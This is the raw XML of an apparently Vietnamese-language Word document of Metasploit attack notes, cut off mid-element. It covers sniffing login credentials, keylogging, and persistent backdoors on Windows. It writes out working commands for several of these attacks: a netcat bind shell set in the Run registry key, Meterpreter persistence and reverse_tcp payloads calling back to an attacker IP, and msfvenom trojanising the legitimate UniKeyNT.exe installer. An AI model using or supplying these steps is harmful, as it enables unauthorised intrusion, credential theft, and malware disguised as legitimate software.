        <w:lastRenderedPageBreak/>
        <w:t>Áp dụng WIRESHARK cùng MSF tấn công theo thời gian thực</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FD235A7" w14:textId="5F991669" w:rsidR="00906D51" w:rsidRDefault="000A402C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grate leo thang rồi load module sniffer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EFD9CFA" w14:textId="1073053E" w:rsidR="000A402C" w:rsidRDefault="000A402C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402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EF79AA" wp14:editId="33FFB775">
            <wp:extent cx="5943600" cy="38944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D658" w14:textId="27A87154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em interface, capture</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A75C7D5" w14:textId="0410690E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354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51B2E4" wp14:editId="39BE9D5E">
            <wp:extent cx="5943600" cy="13195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B997" w14:textId="77777777" w:rsidR="00503545" w:rsidRDefault="005035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9AE0C8" w14:textId="5FD7A50C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Nhập thông tin đăng nhập ở máy mục tiêu</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="170C49FC" w14:textId="7E2307F5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354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A86482" wp14:editId="6E7AF557">
            <wp:extent cx="4352925" cy="3105126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5868" cy="31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3DDD" w14:textId="668C7BF8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ắt sniff và lưu file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="367CD194" w14:textId="78F4AA60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354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17CA21" wp14:editId="1D3798FC">
            <wp:extent cx="5943600" cy="21545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12DE" w14:textId="7BBFF119" w:rsidR="00503545" w:rsidRDefault="005035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D914A0A" w14:textId="0E5C167D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ật wireshark thì capture được thông tin đăng nhập</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="772F62D0" w14:textId="211FA130" w:rsidR="00503545" w:rsidRDefault="00503545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354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663634" wp14:editId="1A12F188">
            <wp:extent cx="5943600" cy="22942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729F" w14:textId="627522D7" w:rsidR="00947044" w:rsidRDefault="00947044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C66D38" w14:textId="5158D263" w:rsidR="00947044" w:rsidRDefault="00947044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8C0006" w14:textId="600960E7" w:rsidR="00947044" w:rsidRDefault="00947044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7044">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Dùng Port Forwarding khai thác thông tin System</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62D754E8" w14:textId="03FF15EB" w:rsidR="00507175" w:rsidRDefault="00A42BF7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2BF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BEB733B" wp14:editId="22B06BFD">
            <wp:extent cx="5744377" cy="3038899"/>
            <wp:effectExtent l="0" t="0" r="889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BF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8FE414B" wp14:editId="1F2EC33D">
            <wp:extent cx="5943600" cy="52959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DD4" w14:textId="77777777" w:rsidR="00507175" w:rsidRDefault="005071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905AFA" w14:textId="54BF3550" w:rsidR="00A42BF7" w:rsidRDefault="0053550B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3550B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>TẤN CÔNG Registry để giữ kết nối vĩnh viễn sau khi thâm nhập system</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="466D1A99" w14:textId="62824101" w:rsidR="000C6133" w:rsidRDefault="000C6133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613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1F8E9A" wp14:editId="4D4B72DC">
            <wp:extent cx="5943600" cy="6299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7BBE" w14:textId="3661E125" w:rsidR="000C6133" w:rsidRPr="000D42CB" w:rsidRDefault="000C6133" w:rsidP="00297921">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D42CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Up backdoor vào máy bị tấn công</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A04B076" w14:textId="7B9A3D3E" w:rsidR="000C6133" w:rsidRPr="000D42CB" w:rsidRDefault="000C6133" w:rsidP="00297921">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D42CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>upload /home/kali/Desktop/nc.exe C:\\Windows\\System32</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37EC342C" w14:textId="6F41AE3F" w:rsidR="000C6133" w:rsidRPr="000D42CB" w:rsidRDefault="000C6133" w:rsidP="00297921">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D42CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="69742CAF" wp14:editId="10735581">
            <wp:extent cx="5943600" cy="585470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DB0" w14:textId="537F4276" w:rsidR="00585956" w:rsidRPr="000D42CB" w:rsidRDefault="00585956" w:rsidP="00297921">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D42CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>reg enumkey -k HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23344CA3" w14:textId="2B268DF9" w:rsidR="000D42CB" w:rsidRPr="000D42CB" w:rsidRDefault="000D42CB" w:rsidP="00297921">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D42CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>reg setval -k HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\ -v backdoor -d 'C:\\Windows\System32\nc.exe -Ldp 4449 -e cmd.exe'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01215763" w14:textId="4CA5C762" w:rsidR="000D42CB" w:rsidRPr="000D42CB" w:rsidRDefault="000D42CB" w:rsidP="00297921">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D42CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>reg queryval -k HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\ -v backdoor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32C57A12" w14:textId="21448D9C" w:rsidR="000C6133" w:rsidRDefault="00585956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59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08560D" wp14:editId="558876C8">
            <wp:extent cx="5943600" cy="2019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69BB" w14:textId="6CE2CF57" w:rsidR="002A1E1C" w:rsidRDefault="002A1E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ách này không hoạt động khi hệ thống đã vá lỗi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="543936F6" w14:textId="77777777" w:rsidR="002A1E1C" w:rsidRDefault="002A1E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2297E65" w14:textId="77777777" w:rsidR="000678E1" w:rsidRDefault="000678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F94C19" w14:textId="7BFD95CA" w:rsidR="000678E1" w:rsidRDefault="000678E1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78E1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Key logging trong MSF</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05CCAA43" w14:textId="22AD14CF" w:rsidR="000678E1" w:rsidRDefault="000678E1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78E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6C41AB" wp14:editId="23D6A17A">
            <wp:extent cx="5943600" cy="33045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15ED" w14:textId="0646FB8E" w:rsidR="000678E1" w:rsidRDefault="000678E1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78E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2D3347" wp14:editId="04ADFA0B">
            <wp:extent cx="5943600" cy="12211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CBF6" w14:textId="5E82355D" w:rsidR="008A72A2" w:rsidRDefault="008A72A2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A4FF07" w14:textId="77777777" w:rsidR="006E6E1F" w:rsidRDefault="006E6E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4461BC8" w14:textId="5452D1C2" w:rsidR="006E6E1F" w:rsidRDefault="006E6E1F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E1F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>TẤN CÔNG và giữ kết nối vĩnh viễn với Advanced Meterpreter Wormhole</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0845F0D9" w14:textId="48EAF6F6" w:rsidR="008467D3" w:rsidRDefault="008467D3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111235" w14:textId="766AC4AA" w:rsidR="002A1E1C" w:rsidRPr="002A1E1C" w:rsidRDefault="002A1E1C" w:rsidP="00297921">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A1E1C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Cách tấn công này giúp tạo 1 process tự động chạy trên máy mục tiêu, giúp vẫn truy cập được hệ thống khi hệ thống đã vá lỗi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60E9DC23" w14:textId="290C11DC" w:rsidR="008467D3" w:rsidRPr="002A1E1C" w:rsidRDefault="008467D3" w:rsidP="00297921">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A1E1C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>run persistence -X -p 442 -i 5 -r  192.168.44.128</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F15F146" w14:textId="74E2FD57" w:rsidR="008467D3" w:rsidRPr="002A1E1C" w:rsidRDefault="008467D3" w:rsidP="00297921">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A1E1C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>-X : tạo agent trên máy mục tiêu</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="431DDBCE" w14:textId="0FD05608" w:rsidR="008467D3" w:rsidRPr="002A1E1C" w:rsidRDefault="008467D3" w:rsidP="00297921">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A1E1C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>-i: thời gian</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="468139A9" w14:textId="4EC21F73" w:rsidR="008467D3" w:rsidRPr="002A1E1C" w:rsidRDefault="008467D3" w:rsidP="00297921">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A1E1C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>-r: nhập ip máy kali tấn công</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="083D5985" w14:textId="7F86001F" w:rsidR="008467D3" w:rsidRDefault="008467D3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67D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22C9DD" wp14:editId="17B244C4">
            <wp:extent cx="5943600" cy="16548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AE01" w14:textId="2D9A2A60" w:rsidR="003930B0" w:rsidRDefault="003930B0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30B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8BBBEE" wp14:editId="3225AB46">
            <wp:extent cx="5943600" cy="21234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77D" w14:textId="11AAE938" w:rsidR="0052573E" w:rsidRPr="002A1E1C" w:rsidRDefault="002A1E1C" w:rsidP="00297921">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A1E1C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>msfvenom -p windows/meterpreter/reverse_tcp  LHOST=192.168.44.128  LPORT=442 -f exe -a x86 --platform windows -o  persis.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64C1B0FB" w14:textId="2B05600B" w:rsidR="002A1E1C" w:rsidRDefault="002A1E1C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1E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104A84A" wp14:editId="27636423">
            <wp:extent cx="5943600" cy="8489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4ADC" w14:textId="4BA9F3B5" w:rsidR="002A1E1C" w:rsidRPr="006F5230" w:rsidRDefault="006F5230" w:rsidP="00297921">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F5230">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>use exploit/multi/handler</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51F73534" w14:textId="35AD52B5" w:rsidR="006F5230" w:rsidRPr="006F5230" w:rsidRDefault="006F5230" w:rsidP="00297921">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F5230">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>set payload windows/meterpreter/reverse_tcp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="554AA7F2" w14:textId="3CBDE508" w:rsidR="006F5230" w:rsidRPr="006F5230" w:rsidRDefault="006F5230" w:rsidP="00297921">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F5230">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>set LHOST 192.168.44.128</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C083E45" w14:textId="41AC744A" w:rsidR="006F5230" w:rsidRPr="006F5230" w:rsidRDefault="006F5230" w:rsidP="00297921">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F5230">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>set LPORT 442</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FF6170D" w14:textId="3832CB5E" w:rsidR="006F5230" w:rsidRPr="006F5230" w:rsidRDefault="006F5230" w:rsidP="00297921">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F5230">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FB0AA6C" w14:textId="741DFDBC" w:rsidR="006F5230" w:rsidRDefault="006F5230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52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43F1EF" wp14:editId="38EB09FF">
            <wp:extent cx="5943600" cy="176276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EC11" w14:textId="77777777" w:rsidR="00576C0B" w:rsidRDefault="0057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9C0B29" w14:textId="3C0FBEBB" w:rsidR="00CF2CCA" w:rsidRPr="00CF2CCA" w:rsidRDefault="00CF2CCA" w:rsidP="00297921">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CF2CCA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Tạo persistence bằng meterpreter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B070E4F" w14:textId="6CC61B4C" w:rsidR="00CF2CCA" w:rsidRPr="00CF2CCA" w:rsidRDefault="00CF2CCA" w:rsidP="00297921">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CF2CCA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>run post/windows/manage/persistence_exe REXENAME=persis.exe REXEPATH=/home/kali/persis.exe STARTUP=SYSTEM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07122CAC" w14:textId="47F45EB9" w:rsidR="00CF2CCA" w:rsidRPr="00CF2CCA" w:rsidRDefault="00CF2CCA" w:rsidP="00297921">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CF2CCA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>bg</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04E2CBA2" w14:textId="2FEDE2D5" w:rsidR="00CF2CCA" w:rsidRPr="00CF2CCA" w:rsidRDefault="00CF2CCA" w:rsidP="00297921">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CF2CCA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5423E570" w14:textId="14B123BE" w:rsidR="00CF2CCA" w:rsidRDefault="00CF2CCA" w:rsidP="00297921">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CF2CCA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AB4E226" w14:textId="26A3760E" w:rsidR="00576C0B" w:rsidRPr="00CF2CCA" w:rsidRDefault="00576C0B" w:rsidP="002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ạo persistence thì dù khởi động lại exploit thì vẫn có thể kết nối lại bằng nc hoặc qua module:  </w:t>
      </w:r>
      <w:r w:rsidRPr="006F5230">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>exploit/multi/handler</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C0AE538" w14:textId="7CF8BC20" w:rsidR="001A211C" w:rsidRDefault="00CF2CCA" w:rsidP="002979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2C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1F76C8" wp14:editId="131B755D">
            <wp:extent cx="5943600" cy="520001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4EB" w14:textId="77777777" w:rsidR="00AD0AD2" w:rsidRDefault="00AD0A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D56034B" w14:textId="57A585FA" w:rsidR="00FC101B" w:rsidRDefault="00FC101B" w:rsidP="00FC10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ERSISTENCE PART 2:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25EB7908" w14:textId="77777777" w:rsidR="00DF23C4" w:rsidRDefault="00AD0A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0AD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A74BE86" wp14:editId="34706A29">
            <wp:extent cx="5943600" cy="3613785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D79" w14:textId="05E9A998" w:rsidR="00DF23C4" w:rsidRDefault="00617C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17CC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B7AB9CE" wp14:editId="49D7ED3A">
            <wp:extent cx="5943600" cy="21697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D8CC" w14:textId="36D3D517" w:rsidR="00881234" w:rsidRDefault="008812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t </w:t>
      </w:r>
      <w:r w:rsidR="00872F0E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>explo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ulti hander để tạo lisenter – tương tự nc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41C60B47" w14:textId="6EF66A95" w:rsidR="00D73984" w:rsidRDefault="00D739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398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E63D43B" wp14:editId="202DA8DB">
            <wp:extent cx="5943600" cy="4907915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C92" w14:textId="67CA6110" w:rsidR="001A211C" w:rsidRDefault="001A21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F73872" w14:textId="4181DD9F" w:rsidR="00CF2CCA" w:rsidRDefault="00DD50DE" w:rsidP="009455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0DE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Đóng gói Virus vào trong Software Hợp Pháp để tạo kết nối vĩnh viễn</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E1FF900" w14:textId="32390450" w:rsidR="009455A2" w:rsidRPr="009455A2" w:rsidRDefault="00AE78C2" w:rsidP="00AE7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file malware tích hợp vào trong 1 phần mềm bình thường:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DB01A49" w14:textId="6ADB351C" w:rsidR="009455A2" w:rsidRDefault="009455A2" w:rsidP="009455A2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009455A2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.44.128 LPORT=445 --platform windows -a x86 -f exe -x /home/kali/Desktop/UniKeyNT.exe -k -o /home/kali/Desktop/1UniKeyNT.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76917193" w14:textId="4BE536E2" w:rsidR="00AE78C2" w:rsidRDefault="00AE78C2" w:rsidP="009455A2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AE7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755DE" wp14:editId="70549815">
            <wp:extent cx="5943600" cy="109982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8AA4" w14:textId="76FD96DF" w:rsidR="00AE78C2" w:rsidRDefault="00AE78C2" w:rsidP="0094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đó dùng python để down về máy bị tấn công</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7991D667" w14:textId="50969BAB" w:rsidR="00AE78C2" w:rsidRDefault="00AE78C2" w:rsidP="0094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n máy tấn công dung exploit/multi/handler để bắt lại quyền truy cập vào máy tấn công</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D57F3E8" w14:textId="12A171D9" w:rsidR="00736083" w:rsidRDefault="00AE78C2" w:rsidP="0094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ùng </w:t>
      </w:r>
      <w:r w:rsidR="00736083">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>câu lệnh:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CDED686" w14:textId="56994CA6" w:rsidR="00AE78C2" w:rsidRDefault="00AE78C2" w:rsidP="009455A2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AE78C2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>set AutoRunScript 'post/windows/manage/migrate NAME=explorer.exe SPAWN=false'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="521E6CB2" w14:textId="712A1CC4" w:rsidR="00736083" w:rsidRDefault="00736083" w:rsidP="0094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ự động chạy script khi session được khởi tạo.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54D18E34" w14:textId="6CCC29D9" w:rsidR="00AE78C2" w:rsidRDefault="00AE78C2" w:rsidP="009455A2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AE7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349F4" wp14:editId="0198F374">
            <wp:extent cx="5906324" cy="163852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DD2" w14:textId="705FE3D0" w:rsidR="000644F3" w:rsidRDefault="000644F3" w:rsidP="0094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đó chạy file exe trong máy bị tấn công</w:t>
      </w:r>
      <w:r w:rsidR="001E4F95">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>. Và đợi session được mở.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17CC1E08" w14:textId="25CA7C72" w:rsidR="006A7619" w:rsidRDefault="001E4F95" w:rsidP="009455A2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
